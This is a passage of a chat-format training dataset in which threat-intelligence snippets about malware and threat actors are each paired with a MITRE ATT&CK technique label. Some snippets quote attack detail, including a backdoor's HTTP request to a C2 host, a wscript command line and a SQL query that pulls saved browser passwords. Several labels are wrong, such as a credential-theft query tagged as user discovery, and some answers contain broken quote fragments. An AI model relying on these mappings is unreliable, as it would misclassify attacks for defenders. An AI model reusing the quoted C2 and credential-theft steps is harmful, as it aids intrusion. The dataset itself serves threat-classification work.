- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be configured to use raw TCP or UDP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This time, the text is from the novel \"The Brothers Karamazov\" by Fyodor Dostoevsky (a Russian writer). The malicious document drops a Python interpreter and PoetRAT. The author made a few changes to the PoetRAT malware, though. First, the malware uses pyminifier to obfuscate the Python script and avoid detection based on string or YARA rules: The obfuscation is a base64 and an LZMA compression algorithm. Secondly, the author split the malware in a couple of different files. For example, the variables are stored in a \"Constant.py\" file containing the C2 server and the configuration. The most notable change is the protocol used to download and upload files"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca required users to click on a malicious file for the loader to activate."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has collected emails from victim Microsoft Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can download additional modules and malware capable of using separate C2 channels."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts C2 traffic using RC4 with a static key."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can use HTTP in C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"net user\" to enumerate local accounts on the system."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance we observed, one of the initial malware delivered to the victim, RATANKBA (TROJ_RATANKBA.A), connects to a legitimate but compromised website (eye-watch[.]in:443, a mobile application-selling site) from which a hack tool (nbt_scan.exe) is also downloaded"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 malware often uses HTTP and DNS for C2. The group has also used the Plink utility and other tools to create tunnels to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "m\": mode: net or local. local - encrypt local drives only and ignore network shares. h\": path to a file that contains specific hosts (names and IPs) to enumerate for shares. s\": IP address that the initial register message will be sent to"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX checks if VMware tools is running in the background by searching for any process named \"vmtoolsd\"."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For FunnyDream, the threat actors used a new backdoor named FunnyDream."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke's miner, \"TermsHost.exe\", evaded defenses by injecting itself into Windows processes, including Notepad.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. The VBA functions trigger when the victim types any content into the maldoc. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware will actually search through the /Users/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy creates a Registry subkey that registers a new system device."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used malware to disable Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used WMI to automate the remote execution of PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYS Deletes the file named by tempPath + “ky” file so as not to upload anything"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used Hermes ransomware to encrypt files with AES256."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can list connected devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "spwebmember was written in Microsoft .NET and includes hardcoded values for client project names for data extraction"
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can use the command-line utility cacls.exe to change file permissions."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL uses fake Transport Layer Security (TLS) to communicate with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can use TCP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lists processes running on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evilnum can deploy additional components or tools as needed."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been used to run the \"whoami\" command on the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware installs itself as a service to provide persistence and SYSTEM privileges."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang has the ability to encode and RC6 encrypt data sent to C2."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used an open source batch script to modify Windows Defender registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax can spawn a command shell, and execute native commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has used DCSync attacks to gather credentials for privilege escalation routines."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak checks the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" for proxy configurations information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link', 'T1105 - Ingress Tool Transfer', 'T1102.002 - Bidirectional Communication', 'T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Port Numbers 443 and 80 for the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal can check the system time set on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable version of has a module to log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has used `is_debugger_present` as part of its environmental checks."
- },
- {
- "role": "assistant",
- "content": "T1622 - Debugger Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest hides a copy of itself in the user's \"~/Library\" directory by using a \".\" at the beginning of the file name followed by 9 random characters."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon attempts to copy itself to remote machines on the network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk attempts to reboot the machine by terminating specific processes."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vidar is an info-stealer. It downloads DLL files freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from its C&C for use in password-grabbing routines."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can use the Windows command line to delete volume shadow copies and disable recovery."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has obtained domains to host their payloads."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following HTTP request from the Helminth backdoor (SHA256: 1fb69090be8a2e11eeb220b26ee5eddf1e3fe81ffa59c47d47d01bf90c2b080c) downloaded the similar batch script: GET /update-index.aspx?req=1786873725%5Cbat&m=d HTTP/1.1 Host: update-kernal[.]net Connection: Keep-Alive We performed a code comparison to visualize the similarities between the batch script delivered as the default command in Poison Frog is to the script provided to the Helminth backdoor"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can pad C2 messages with random generated values."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind has a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki’s container was configured to bind the host root directory."
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaBricks can download additional payloads onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can search directories for files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses Cobalt Strike as framework to manage their compromised systems. We observed the use of Cobalt Strike’s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is they made use of a cracked/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike’s trial version are limited. More importantly: the trial version doesn’t support encryption of command and control traffic in cases where the protocol itself isn’t encrypted, such as DNS. The DNS-responses weren’t logged. This means that only the DNS C2 leaving the victim’s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "supports execution from the command-line."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also attempts to issue the following SQL query on the “signons.sqlite” file: “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins WHERE timePasswordChanged/1000 BETWEEN ? AND ?” 117 ftpUpload Uses FTPManager:uploadFile method and a supplied server name, username and password"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a PowerShell backdoor."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network"
- },
- {
- "role": "assistant",
- "content": "T1595 - Active Scanning', 'T1592 - Gather Victim Host Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem has lured victims into opening macro-enabled Word documents for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can create a new service, naming it after the config information, to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
